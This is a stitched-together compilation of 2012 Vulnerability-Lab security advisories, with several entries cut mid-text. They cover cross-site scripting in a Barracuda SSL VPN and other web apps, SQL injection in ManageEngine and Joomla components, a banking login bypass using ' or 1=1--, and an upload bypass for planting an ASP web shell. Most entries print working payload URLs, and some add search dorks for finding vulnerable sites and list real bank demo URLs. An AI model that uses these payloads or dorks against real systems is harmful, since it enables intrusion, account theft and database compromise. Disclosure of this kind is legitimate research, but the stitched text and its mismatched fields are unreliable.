Barracuda Appliances - Validation Filter Bypass Vulnerability
in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   - www.vuln-lab.com                  - www.vulnerability-lab.com/register
Contact:    ad...@vulnerability-lab.com - supp...@vulnerability-lab.com     - resea...@vulnerability-lab.com
Section:    video.vulnerability-lab.com - forum.vulnerability-lab.com       - news.vulnerability-lab.com
Social:     twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab     - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory

--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com
Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities
Title:
======
Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities

Date:
=====
2012-07-16

References:
===========
http://vulnerability-lab.com/get_content.php?id=561
Barracuda Networks Security ID: BNSEC-278

VL-ID:
=====
561

Common Vulnerability Scoring System:
====================================
3

Introduction:
=============
The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any Web browser. Designed for remote employees and road warriors, the Barracuda SSL VPN provides comprehensive control over file systems and Web-based applications requiring external access. The Barracuda SSL VPN integrates with third-party authentication mechanisms to control user access levels and provides single sign-on.

Barracuda SSL VPN
* Enables access to corporate intranets, file systems or other Web-based applications
* Tracks resource access through auditing and reporting facilities
* Scans uploaded files for viruses and malware
* Leverages multi-factor, layered authentication mechanisms, including RSA SecurID and VASCO tokens
* Integrates with existing Active Directory and LDAP directories
* Utilizes policies for granular access control framework
* Supports any Web browser on PC or Mac

(Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/sslvpn.php)

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Barracuda SSL VPN 680 appliance application.

Report-Timeline:
================
2012-06-09: Researcher Notification & Coordination
2012-06-10: Vendor Notification
2012-07-12: Vendor Response/Feedback
2012-07-14: Vendor Fix/Patch
2012-07-16: Public Disclosure

Status:
=======
Published

Affected Products:
==================
Barracuda Networks
Product: SSL VPN Appliance v680 - 2.2.2.115

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple non-persistent cross site scripting vulnerabilities are detected in the Barracuda SSL VPN 680 v2.2.2.115 appliance application. The vulnerabilities allow remote attackers to hijack website customer, moderator or admin sessions, with high user interaction required. The bugs are located in the fileSystem.do, showUserResourceCategories.do and launchAgent.do files, in the bound vulnerable policyLaunching, resourcePrefix, path and return-To parameters. Successful exploitation can result in account theft, phishing and client-side content/request manipulation.

Vulnerable Module(s):
[+] showUserResourceCategories.do&messageResourcesKey=resourceCategory
[+] fileSystem.do?launchId=l52ca6d&actionTarget=list&path=
[+] launchAgent.do

Vulnerable Parameter(s):
[+] policyLaunching & resourcePrefix
[+] listpath
[+] return-To

Proof of Concept:
=================
The client-side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high user interaction required. For demonstration or reproduce ...

1.1
https://sslvpn.[SERVER]/resourceList.do?form=resourceCategoriesForm&readOnly=test&path=%2FshowUserResourceCategories.do&messageResourcesKey=resourceCategory&actionPath=[NON-PERSISTENT SCRIPT CODE!]

1.2
https://sslvpn.[SERVER]/[FILE].do?[VALUE #1]=l52ca6d&[VALUE #2]=[VALUE #3]&[PATH LISTING]=smb/Sales%20Folder/Opt/[NON-PERSISTENT SCRIPT CODE!]

PoC:
https://sslvpn.[SERVER]/fileSystem.do?launchId=l52ca6d&actionTarget=list&path=smb/Sales%20Folder/Testing%20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

1.3
https://sslvpn.[SERVER]/launchAgent.do?launchId=l3ce418&returnTo=[NON-PERSISTENT SCRIPT CODE!]

Solution:
=========
2012-07-14: Vendor Fix/Patch by Barracuda Networks

Risk:
=====
The security risk of the non-persistent cross site scripting vulnerabilities is estimated as medium(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
ME Application Manager 10 - Multiple Web Vulnerabilities
=showdetails&resourcename=DNS+monitor&viewType=showResourceTypes

http://appmanager.127.0.0.1:1338/jsp/ThresholdActionConfiguration.jsp?resourceid=1055&attributeIDs=101&attributeToSelect=101%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&redirectto=/common/serverinfo.do

http://appmanager.127.0.0.1:1338/ProcessTemplates.do?method=createProcessTemplate&templatetype=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

Risk:
=====
1.1
The security risk of the blind SQL injection vulnerabilities is estimated as high.

1.2
The security risk of the non-persistent cross site scripting vulnerabilities is estimated as medium(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [storm] (st...@vulnerability-lab.com)
Distimo Monitor 6.0 - Multiple Cross Site Vulnerabilities
(+)|(-)medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
ME Mobile Application Manager v10 - SQL Vulnerabilities
Title:
======
ME Mobile Application Manager v10 - SQL Vulnerabilities

Date:
=====
2012-07-04

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=628

VL-ID:
=====
628

Common Vulnerability Scoring System:
====================================
8.1

Introduction:
=============
ManageEngine Mobile Applications Manager is a server and application performance monitoring software that helps businesses ensure high availability and performance for their business applications by ensuring servers and applications have high uptime. The application performance management capability includes server monitoring, application server monitoring, database monitoring, web services monitoring, virtualization monitoring, cloud monitoring and an array of other application management capabilities that help IT administrators manage their resources effectively.

Note: The mobile version 10 is compatible with Blackberry, iPhone & Android smartphones with the IE, Safari or Firefox browser.

(Copy of the Vendor Homepage: http://www.manageengine.com/products/applications_manager )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple SQL injection vulnerabilities in ManageEngine's Mobile Application Manager v10.

Report-Timeline:
================
2012-06-23: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Manage Engine
Product: Mobile Application Manager v10.0

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
Multiple SQL injection vulnerabilities are detected in ManageEngine's Mobile Application Manager v10. The vulnerabilities allow a remote attacker or a local low-privileged user account to inject and execute their own SQL commands on the affected application's DBMS without user interaction. The vulnerabilities are located in the DetailsView.do and Search.do modules, in the bound vulnerable showMGDetails&groupId and viewName parameters. Successful exploitation of the vulnerabilities results in compromise of the application's DBMS via SQL injection.

Vulnerable Module(s):
[+] DetailsView.do
[+] Search.do

Vulnerable Parameter(s):
[+] showMGDetails&groupId
[+] viewName

Proof of Concept:
=================
The SQL injection vulnerabilities in the mobile manager application can be exploited by remote attackers without user interaction. For demonstration or reproduce ...

PoC:
http://appmanager.127.0.0.1:1339/mobile/DetailsView.do?method=showMGDetails&groupId=10003645+UnION+SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+WHERE+table_schema=database()--%20-

http://appmanager.127.0.0.1:1339/mobile/Search.do?method=mobileSearch&requestid=[SQL INJECTION]mobileSearchPage&viewName=Search

Risk:
=====
The security risk of the SQL injection vulnerabilities is estimated as high.

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [storm] (st...@vulnerability-lab.com)
Kaspersky PM 5.0.0.164 - Software Filter Vulnerability
            <RoleValues>
              <RoleValue ID="118" RoleType="37"/>
              <RoleValue ID="119" RoleType="38"/>
              <RoleValue ID="120" RoleType="39"/>
              <RoleValue ID="121" RoleType="40"/>
              <RoleValue ID="122" RoleType="41"/>
              <RoleValue ID="123" RoleType="42"/>
              <RoleValue ID="124" RoleType="43"/>
              <RoleValue ID="125" RoleType="44"/>
              <RoleValue ID="126" RoleType="45"/>
              <RoleValue ID="127" RoleType="46"/>
            </RoleValues>
          </CreditCard>
        </CreditCards>
        <BankAccounts>
          <BankAccount Name="[PERSISTENT INJECTED SCRIPT CODE])" ID="128" ParentID="62"/>
          <BankAccount Name="" ID="129" ParentID="62">
            <RoleValues>
              <RoleValue ID="130" RoleType="47"/>
              <RoleValue ID="131" RoleType="48"/>
              <RoleValue ID="132" RoleType="49"/>
              <RoleValue ID="133" RoleType="50"/>
              <RoleValue ID="134" RoleType="51"/>
              <RoleValue ID="135" RoleType="52"/>
              <RoleValue ID="136" RoleType="53"/>
              <RoleValue ID="137" RoleType="54"/>
              <RoleValue ID="138" RoleType="55"/>
              <RoleValue ID="139" RoleType="56"/>
            </RoleValues>
          </BankAccount>
        </BankAccounts>
      </Identity>
    </Identities>
  </Database>
</root>

Solution:
=========
XML special characters in item names need to be encoded when the database is processed for export as an HTML file.

Risk:
=====
The security risk of the persistent software vulnerability is estimated as low(+)/(-)medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Joomla com_package - SQL Injection Vulnerability
Title:
======
Joomla com_package - SQL Injection Vulnerability

Date:
=====
2012-07-08

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=652

VL-ID:
=====
652

Common Vulnerability Scoring System:
====================================
8.3

Introduction:
=============
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been more than 21 million downloads. As of November 2011, there are over 8,600 free and commercial extensions available from the official Joomla! Extension Directory and more available from other sources.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla)

Abstract:
=========
A Vulnerability-Lab researcher discovered a SQL injection vulnerability in the com_package module of the Joomla CMS.

Report-Timeline:
================
2012-07-08: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
A SQL injection vulnerability is detected in the com_package module of the Joomla Content Management System. Remote attackers or low-privileged user accounts can inject and execute their own SQL commands to compromise the application's DBMS. The vulnerability is located in the com_package module, in the bound vulnerable id parameter. Successful exploitation of the vulnerability results in compromise of the DBMS (server) or the application (web).

Vulnerable Module(s):
[+] index.php?option=com_package

Vulnerable Parameter(s):
[+] id

Proof of Concept:
=================
The SQL injection vulnerability can be exploited by remote attackers without a privileged user account or required user interaction. For demonstration or reproduce ...

PoC:
Path:      /
File:      index.php
Module:    ?option=com_package
Parameter: details&id=-1'[SQL Injection]--

URL: http://www.xxx.com/index.php?option=com_package&task=details&id=174-1'[SQL Injection]--

Risk:
=====
The security risk of the remote SQL injection vulnerability is estimated as critical.

Credits:
========
Vulnerability Research Laboratory - Chokri Ben Achor (meis...@vulnerability-lab.com)
iAuto Mobile Application 2012 - Multiple Web Vulnerabilities
%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search

Browse by Make and Model / AC Cobra /
PoC:
http://iauto.xxx.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/

Comments / Reply to The Comment / Topic Text (commentSid)
PoC:
http://iauto.xxx.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F

Risk:
=====
1.1
The security risk of the persistent input validation vulnerability is estimated as medium(+).

1.2
The security risk of the non-persistent cross site scripting vulnerabilities is estimated as low(+)|(-)medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Inout Mobile Webmail APP - Multiple Web Vulnerabilities
Title:
======
Inout Mobile Webmail APP - Multiple Web Vulnerabilities

Date:
=====
2012-06-08

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=609

VL-ID:
=====
609

Common Vulnerability Scoring System:
====================================
3.5

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the inoutscripts mobile Inoutmail Webmail CMS 2012.

Report-Timeline:
================
2012-06-08: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected in the inoutscripts mobile Inoutmail CMS 2012. The bugs allow remote attackers to inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction and a privileged user account.

The persistent validation vulnerabilities are located in the new mail and contacts modules with the bound vulnerable To, Bcc and Cc values. The bug can be exploited by remote attackers: the attacker sends a malicious mail with script code values as content, and the admin or customer views the arriving mail with the persistent script code in the To or Bcc inputs. The script code is executed (persistent) when the user, customer or admin checks his mails. A privileged user account can also use the bug to store the code persistently for exploitation of higher privileged user accounts.

Vulnerable Module(s):
  [+] New Mail
  [+] Contacts

Vulnerable Parameter(s):
  [+] To
  [+] Cc
  [+] Bcc

Proof of Concept:
=================
The persistent vulnerabilities can be exploited by remote attackers with low required user interaction.
For demonstration or reproduce ...

Insert the demonstration string into the Bcc, Cc or To field of the send new mail form. The second possibility is to send a mail from outside to the inout webmail with the string code values.

PoC:
<iframe src=http://vuln-lab.com onload=alert(VL)>

Risk:
=====
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - snup (s...@vulnerability-lab.com) [http://snup1.blogspot.com]

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:  www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact:  ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com
Section:  video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social:   twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:    vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY | LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com
BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability
Title:
======
BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability

Date:
=====
2012-07-09

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=654

VL-ID:
=====
654

Common Vulnerability Scoring System:
====================================
8.5

Abstract:
=========
A Vulnerability-Lab researcher discovered an SQL injection vulnerability in the Beneficial Bank Business Banking v4.13.1 CMS.

Report-Timeline:
================
2012-07-09: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
An Auth Bypass vulnerability is detected in the Beneficial Bank Business Banking 4.13.1 Content Management System. Remote attackers without privileged user accounts can execute/inject own sql commands to compromise the application dbms. The vulnerability is located in the login module with the bound vulnerable Company ID & Company Password parameters. Successful exploitation of the vulnerability results in dbms (Server) or application (Web) compromise and unauthorized web application (admin/customer) panel access.

Vulnerable Section(s):
  [+] Login

Vulnerable Parameter(s):
  [+] User & Pass

Proof of Concept:
=================
The login auth bypass vulnerability can be exploited by remote attackers without a privileged user account.
For demonstration or reproduce ...

PoC:
user : ' or 1=1--
pass : ' or 1=1--

URL:
http://www.thebeneficial-ebanking.com/customer_demo/index2.html
https://www.frontrangebankonline.com/customer_demo/index2.html
http://www.libertybaybank.com/customer_demo/index2.html
http://www.fs-bankonline.com/customer_demo/index2.html
http://www.centralstateonline.com/customer_demo/index2.html
http://www.hvbonlinebanking.com/customer_demo/index2.html

Risk:
=====
The security risk of the auth bypass vulnerability is estimated as critical.

Credits:
========
Vulnerability Research Laboratory - Chokri Ben Achor (meis...@vulnerability-lab.com)
Flogr v2.5.6 v2.3 - Cross Site Script Vulnerabilities
Title:
======
Flogr v2.5.6 & v2.3 - Cross Site Script Vulnerabilities

Date:
=====
2012-07-11

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=656

VL-ID:
=====
656

Common Vulnerability Scoring System:
====================================
2

Introduction:
=============
Flogr is a flexible script that displays your flickr photos in a customizable photo gallery you host on your website. If you use flickr but want to have a different look and feel for your photo gallery you may like flogr.

Customizable photoblog interface for your flickr photos
Display all flickr photos, only photos with certain tags or only certain photosets
Displays photo details, EXIF data, tags, geo location, and photo comments
Thumbnail viewer displays photos by date taken, photoset, and tag
Embedded Slimbox photo slideshow
Map view of your geo tagged photos
Flickr tag cloud page
RSS 2.0 support

(Copy of the Vendor Homepage: https://code.google.com/p/flogr/ )

Abstract:
=========
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered multiple non persistent Cross Site Scripting Vulnerabilities in the Flogr v2.5.6 & v2.3 photo gallery CMS.

Report-Timeline:
================
2012-07-11: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple non persistent cross site scripting vulnerabilities are detected in the Flogr v2.5.6 & v2.3 photo gallery CMS. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required user interaction or a local low privileged user account. The vulnerabilities are located in recent.php and index.php with the bound vulnerable tag parameter. Successful exploitation can result in account theft, phishing and client-side content request manipulation.

Vulnerable Module(s):
  [+] Recent Listing
  [+] Index Listing

Vulnerable File(s):
  [+] Recent.php
  [+] Index.php

Vulnerable Parameter(s):
  [+] Tag

Proof of Concept:
=================
Dork(s):
inurl:tag= powered by flogr v2.3
inurl:tag= powered by flogr v2.5.6
inurl:tag= powered by flogr v1.7

PoC:
http://[TARGET]/recent.php?tag=[CROSS SITE SCRIPTING]
http://[TARGET]/index.php?tag=[CROSS SITE SCRIPTING]

Reference(s):
xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E
xxx.com/bigpictureproject/index.php?tag=script src%3d//xxx.com/s/script
xxx.com/flogr/recent.php?tag=script src%3d//xxx.com/s/script
xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E

Risk:
=====
The security risk of the client side cross site scripting vulnerabilities is estimated as low(+)|(-)medium.

Credits:
========
Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242
Joomla com_fireboard - SQL Injection Vulnerability
Title:
======
Joomla com_fireboard - SQL Injection Vulnerability

Date:
=====
2012-07-11

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=655

VL-ID:
=====
655

Common Vulnerability Scoring System:
====================================
7.3

Introduction:
=============
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been more than 21 million downloads. As of November 2011, there are over 8,600 free and commercial extensions available from the official Joomla! Extension Directory and more available from other sources.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla)

Abstract:
=========
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a SQL Injection Vulnerability in the com_fireboard module of the joomla CMS.

Report-Timeline:
================
2012-07-11: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A SQL Injection vulnerability is detected in the com_fireboard module of the joomla Content Management System. Remote attackers with low privileged user accounts can execute/inject own sql commands to compromise the application dbms. The vulnerability is located in the com_fireboard module with the bound vulnerable func & fb_ parameters. Successful exploitation of the vulnerability results in dbms (Server) or application (Web) compromise.

Vulnerable Module(s):
  [+] index.php?option=com_fireboard

Vulnerable Parameter(s):
  [+] func & fb_

Proof of Concept:
=================
The sql injection vulnerability can be exploited by remote attackers without user interaction with a low privileged user account.
For demonstration or reproduce ...

Dork(s):
inurl:id= intext:/com_fireboard/

PoC:
http://[TARGET]/index.php?option=com_fireboard&Itemid=0&id=1&catid=0&func=fb_pdf'[SQL-INJECTION]

Reference(s):
xxx.com/index.php?option=com_fireboard&Itemid=0&id=1&catid=5&func=fb_pdf'[SQL-INJECTION]
xxx.com/2012/index.php?option=com_fireboard&Itemid=79&id=1&catid=2&func=fb_pdf'[SQL-INJECTION]
xxx.com/fireboard/index.php?option=com_fireboard&Itemid=38&id=22111&catid=16&func=fb_pdf'[SQL-INJECTION]
xxx.com/board/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]
xxx.com/jmfireboard/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]

Risk:
=====
The security risk of the remote sql injection vulnerability is estimated as high(+).

Credits:
========
Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242
Arasism (IR) CMS - File Upload Vulnerability
Title:
======
Arasism (IR) CMS - File Upload Vulnerability

Date:
=====
2012-07-12

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=657

VL-ID:
=====
657

Common Vulnerability Scoring System:
====================================
6.5

Abstract:
=========
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a File Upload Vulnerability in the Arasism CMS.

Report-Timeline:
================
2012-07-12: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A File Upload vulnerability is detected in the well-known Iranian Arasism.com Content Management (Panel) System. The vulnerability allows a (remote) attacker with a low privileged user account to bypass the picture upload validation when processing by including own .asp/.php files. Successful exploitation of the vulnerability results in malicious file uploads (malware or webshells) to compromise the application dbms or application system.

Vulnerable Path:
  [+] ../sysop/

Vulnerable File(s):
  [+] RTE_popup_file_atch.asp

Proof of Concept:
=================
The remote file upload vulnerability can be exploited by remote attackers without user interaction.
For demonstration or reproduce ...

Dork(s):
Powered by Arasism.com
Designed & Powered By Hadi Farzad
Powered By : www.Arasism.Com
طراحی و اجرا : هادی فرزاد | یشامان وب فردا

PoC:
Path: ../sysop/
File: RTE_popup_file_atch.asp

NOTE: To upload an asp web shell inject a filename with for example ... shell.asp;1.jpg

Risk:
=====
The security risk of the remote file upload vulnerability is estimated as high.

Credits:
========
Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242
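The Arasism entry describes the classic picture-upload bypass: the server trusts the client-supplied file name, so a name such as shell.asp;1.jpg passes an extension check while the web server serves it as ASP. The block below is an added example in Python, not the vendor's ASP code and not from the advisory author, showing what a defender's upload validation looks like: it rejects path separators, NUL and ';' in the name, rejects double extensions, allow-lists image extensions, checks the file signature against the extension, and never reuses the client's name on disk. ALLOWED_TYPES, validate_upload and stored_name are names assumed here.

```python
import re
import secrets

# Allow-list of image extensions and the magic bytes a file of that type must begin with.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Base name: letters, digits, '_' and '-' only, at most 64 characters.
SAFE_BASENAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename: str, data: bytes):
    """Return (True, ext) for an acceptable picture upload, else (False, reason).

    Every check is on the whole client-supplied name, not just the last extension,
    so 'shell.asp;1.jpg' (IIS semicolon truncation) and 'shell.php.jpg' both fail.
    """
    if any(ch in filename for ch in ("/", "\\", "\0", ";")):
        return False, "forbidden character in filename"
    base, dot, ext = filename.rpartition(".")
    if not dot or not base:
        return False, "missing extension"
    if "." in base:
        return False, "multiple extensions"
    if not SAFE_BASENAME.match(base):
        return False, "unsafe base name"
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed"
    # Signature check: a script body with a .jpg name is rejected even after the name passes.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    return True, ext


def stored_name(ext: str) -> str:
    """Name used on disk: random, server-chosen, with only the validated extension."""
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed samples: a JPEG header and a script body.
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    for name, body in [("shell.asp;1.jpg", jpeg), ("photo.jpg", b"<% eval %>"), ("photo.jpg", jpeg)]:
        ok, info = validate_upload(name, body)
        print(name, "->", "stored as " + stored_name(info) if ok else "rejected: " + info)
```

Store the returned random name in the application's own record for the upload and serve the file from a location that the web server treats as static content, so the original name never reaches the file system or a URL.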
Flynax General Classifieds v4.0 CMS - Multiple Vulnerabilities
=value input[NON PERSISTENT SCRIPT CODE] class=numeric field_from w50 type=text name=f[price][from] maxlength=15img alt= src=http://general.demoflynax.com/templates/general_modern/img/blank.gif; class=between /input value=iframe src=a class=numeric field_to w50 type=text name=f[price][to] maxlength=15 / /div

URL: http://general.[SERVER]:1339/search.html

Risk:
=====
1.1
The security risk of the remote sql injection vulnerability is estimated as critical.

1.2
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

1.3
The security risk of the non persistent cross site scripting vulnerabilities is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities
Title:
======
7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities

Date:
=====
2012-08-12

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=679

VL-ID:
=====
680

Common Vulnerability Scoring System:
====================================
8.3

Abstract:
=========
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered multiple SQL Injection Vulnerabilities in the 7sepehr CMS.

Report-Timeline:
================
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [storm] (st...@vulnerability-lab.com)

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
Multiple SQL Injection vulnerabilities are detected in the official 7sepehr.com Content Management System 2012. Remote attackers can execute/inject own sql commands to compromise the affected application dbms. The vulnerabilities are located in the news_detail, news_view and content asp modules with the bound vulnerable id parameter. Successful exploitation of the remote sql injection vulnerability results in dbms or web application compromise.

Vulnerable File(s):
  [+] news_Detail.asp
  [+] newsview.asp
  [+] contents.aspx

Vulnerable Parameter(s):
  [+] id

Proof of Concept:
=================
The remote sql injection vulnerabilities can be exploited by remote attackers without a privileged user account and without required user interaction.
For demonstration or reproduce ...

Dork:
`Powered by 7sepehr.com`

PoC:
http://127.0.0.1:1338/news/news_Detail.asp?id=-1 union all select [SQL INJECTION VULNERABILITY]--
http://127.0.0.1:1338/news/newsview.asp?id=-1 union all select [SQL INJECTION VULNERABILITY]--
http://127.0.0.1:1338/contents.aspx?id=-1 union all select [SQL INJECTION VULNERABILITY]--

Risk:
=====
The security risk of the remote sql injection vulnerabilities is estimated as critical.

Credits:
========
Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242
Social Engine v4.2.5 - Multiple Web Vulnerabilities
Title:
======
Social Engine v4.2.5 - Multiple Web Vulnerabilities

Date:
=====
2012-07-31

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=672

VL-ID:
=====
672

Common Vulnerability Scoring System:
====================================
3

Abstract:
=========
A Laboratory Researcher [X-Cisadane] discovered multiple Web Vulnerabilities in the Social Engine v4.2.5 web application.

Report-Timeline:
================
2012-07-31: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
